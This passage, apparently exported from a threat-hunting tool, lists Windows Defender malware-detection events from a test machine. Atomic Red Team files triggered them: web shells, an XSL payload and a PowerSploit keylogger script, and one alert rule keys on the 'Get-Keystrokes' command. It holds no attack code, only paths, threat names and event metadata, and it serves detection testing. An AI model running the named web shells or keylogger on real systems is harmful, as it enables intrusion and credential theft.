<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:41:16.418508Z"">
</TimeCreated>
<EventRecordID>75</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147708292</Data>
<Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
<Data Name=""Severity ID"">4</Data>
<Data Name=""Severity Name"">High</Data>
<Data Name=""Category ID"">34</Data>
<Data Name=""Category Name"">Tool</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005)</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:40:16.396422Z"">
</TimeCreated>
<EventRecordID>48</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{8791B1FB-0FE7-412E-B084-524CB5A221F3}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:13.775Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147735426</Data>
<Data Name=""Threat Name"">Trojan:XML/Exeselrun.gen!A</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:XML/Exeselrun.gen!A&amp;threatid=2147735426&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">2</Data>
<Data Name=""Type Name"">%%823</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:40:00.730676Z"">
</TimeCreated>
<EventRecordID>37</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:40:00.730676Z"">
</TimeCreated>
<EventRecordID>37</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Reference in new issue View Git Blame Copy Permalink